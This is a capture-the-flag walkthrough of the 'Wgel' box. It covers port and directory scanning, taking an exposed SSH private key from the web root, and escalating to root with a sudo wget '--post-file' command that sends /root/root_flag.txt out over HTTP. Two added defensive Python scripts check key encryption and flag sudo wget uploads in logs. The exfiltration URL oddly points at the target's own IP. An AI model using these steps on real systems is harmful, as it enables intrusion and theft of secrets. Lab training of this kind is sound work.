Wgel CTF


Last updated 3 years ago


Reconnaissance

Initial nmap scan to find open ports, using the "treat all hosts as alive" flag (-Pn) so the scan does not stop if the box ignores ping probes:

nmap -Pn 10.10.139.244

Detailed nmap scan:

Command breakdown:

  • (-sV): Service version detection

  • (-sC): Default nmap scripts

  • (-p): Scan only ports 22,80

  • (-oN nmap): Save the output to a file called nmap

nmap -sV -sC -p 22,80 -oN nmap 10.10.139.244

Enumeration

Let's visit port 80, the web server.

It's a default Apache2 page, but checking the page source reveals something interesting.

We now have a possible username, Jessie. There is nothing else of interest, so let's run gobuster to find hidden directories.

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.139.244/

We found a hidden directory, so let's check it out.

It is a well-made website. Let's run gobuster against it in the background while we explore the webpage.

gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://10.10.139.244/sitemap

Looking at the website, most of the buttons work and are functional. The gobuster results are in, so let's check them.

There is a /.ssh directory, which is really interesting, so let's go see it.

It contains an id_rsa file, an SSH private key. If the key is passphrase-protected we can try to recover the passphrase with John the Ripper; either way, with the key we can log in through SSH.

First open the file, copy its contents, create our own id_rsa file locally and paste them in.

Now lets find the password for it using ssh2john.

/usr/share/john/ssh2john.py id_rsa > id_rsa_hash

It turns out the key has no passphrase, so we can log in with it directly.
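Whether a private key even needs a passphrase can be read straight from the key file, before reaching for ssh2john, and the same check is what a defender would run over keys found sitting in a web root. The following is an added example and not part of the original writeup: the sample keys are constructed, and the parser only reads the cipher name from the OpenSSH v1 header (or the Proc-Type header of a legacy PEM key).

```python
import base64
import re
import struct


def _ssh_string(data: bytes) -> bytes:
    """Encode bytes as an SSH 'string': 4-byte big-endian length + data."""
    return struct.pack(">I", len(data)) + data


def _openssh_blob(cipher: bytes, kdf: bytes) -> str:
    """Build only the header of an OpenSSH v1 private-key blob, PEM-wrapped.
    (Constructed sample data: magic, ciphername, kdfname, kdfoptions, nkeys.)"""
    raw = (b"openssh-key-v1\x00" + _ssh_string(cipher) + _ssh_string(kdf)
           + _ssh_string(b"") + struct.pack(">I", 1))
    body = base64.b64encode(raw).decode()
    lines = [body[i:i + 70] for i in range(0, len(body), 70)]
    return ("-----BEGIN OPENSSH PRIVATE KEY-----\n" + "\n".join(lines)
            + "\n-----END OPENSSH PRIVATE KEY-----\n")


# Constructed samples, not keys from the box.
SAMPLE_OPENSSH_PLAIN = _openssh_blob(b"none", b"none")
SAMPLE_OPENSSH_ENCRYPTED = _openssh_blob(b"aes256-ctr", b"bcrypt")
SAMPLE_PEM_ENCRYPTED = ("-----BEGIN RSA PRIVATE KEY-----\n"
                        "Proc-Type: 4,ENCRYPTED\n"
                        "DEK-Info: AES-128-CBC,0123456789ABCDEF0123456789ABCDEF\n\n"
                        "AAAA\n-----END RSA PRIVATE KEY-----\n")

_OPENSSH_RE = re.compile(r"-----BEGIN OPENSSH PRIVATE KEY-----(.*?)"
                         r"-----END OPENSSH PRIVATE KEY-----", re.S)


def key_is_encrypted(pem: str) -> bool:
    """Return True if the private key needs a passphrase, False otherwise."""
    if "Proc-Type: 4,ENCRYPTED" in pem:      # legacy PEM (RSA/DSA/EC) format
        return True
    m = _OPENSSH_RE.search(pem)
    if not m:
        return False                          # legacy PEM without encryption headers
    raw = base64.b64decode("".join(m.group(1).split()))
    magic = b"openssh-key-v1\x00"
    if not raw.startswith(magic):
        raise ValueError("not an OpenSSH v1 private key")
    off = len(magic)
    (n,) = struct.unpack(">I", raw[off:off + 4])
    cipher = raw[off + 4:off + 4 + n]         # "none" means no passphrase
    return cipher != b"none"
```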

chmod 600 id_rsa
ssh jessie@10.10.139.244 -i id_rsa

We are logged in and can now read the user.txt file.

Privilege Escalation

Let's run sudo -l to check what we are allowed to run as root.

sudo -l

It looks like we can run /usr/bin/wget as root. Since wget can send a file in an HTTP POST body, we can use it to send the root flag to our machine. First we need an HTTP server on our machine to receive the file.

python3 -m http.server 8080

We also have to start a netcat listener.

Now let's use this command to send the root flag to our machine. We cannot be sure of the root flag's file name, but given how the user flag was named, we can guess it.

sudo /usr/bin/wget --post-file=/root/root_flag.txt http://10.10.139.244

After hitting enter, the listener receives the contents of the file.

This is the root flag.
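From the defensive side, the weakness is the sudo rule that lets a user run wget as root at all, and since sudo logs every invocation to syslog, the upload is also visible after the fact. The following is an added example, not part of the original writeup: it parses constructed auth.log lines in the format sudo writes and flags root-level wget runs that use --post-file, the only wget upload flag this page covers.

```python
import os
import re
from typing import Dict, List

# Constructed sample auth.log lines in sudo's syslog format (not captured from the box).
SAMPLE_AUTH_LOG = """\
Jan 10 12:00:01 wgel sudo:   jessie : TTY=pts/0 ; PWD=/home/jessie ; USER=root ; COMMAND=/usr/bin/wget --post-file=/root/root_flag.txt http://10.10.139.244
Jan 10 12:00:05 wgel sudo:   jessie : TTY=pts/0 ; PWD=/home/jessie ; USER=root ; COMMAND=/usr/bin/wget http://example.com/package.tar.gz
Jan 10 12:00:09 wgel sudo:   admin : TTY=pts/1 ; PWD=/home/admin ; USER=root ; COMMAND=/usr/bin/apt update
"""

# Pull the invoking user, the target user and the full command out of a sudo log line.
SUDO_LINE = re.compile(
    r"sudo:\s+(?P<user>\S+) : .*?USER=(?P<target>\S+) ; COMMAND=(?P<cmd>.*)$")


def find_wget_uploads(log_text: str) -> List[Dict[str, str]]:
    """Return sudo events where wget was run as another user with --post-file.

    --post-file makes wget send a local file as an HTTP POST body, so a root-level
    invocation is a file read / upload event, not an ordinary download.
    """
    hits = []
    for line in log_text.splitlines():
        m = SUDO_LINE.search(line)
        if not m:
            continue
        argv = m.group("cmd").split()
        if not argv or os.path.basename(argv[0]) != "wget":
            continue
        posted = [a.split("=", 1)[1] for a in argv[1:] if a.startswith("--post-file=")]
        if posted:
            hits.append({"user": m.group("user"), "as": m.group("target"),
                         "file": posted[0], "url": argv[-1]})
    return hits


if __name__ == "__main__":
    for hit in find_wget_uploads(SAMPLE_AUTH_LOG):
        print(f"ALERT: {hit['user']} uploaded {hit['file']} as {hit['as']} to {hit['url']}")
```

The fix on the host is to drop the wget rule from sudoers rather than to tune detection, but the parser shows which past invocations need review.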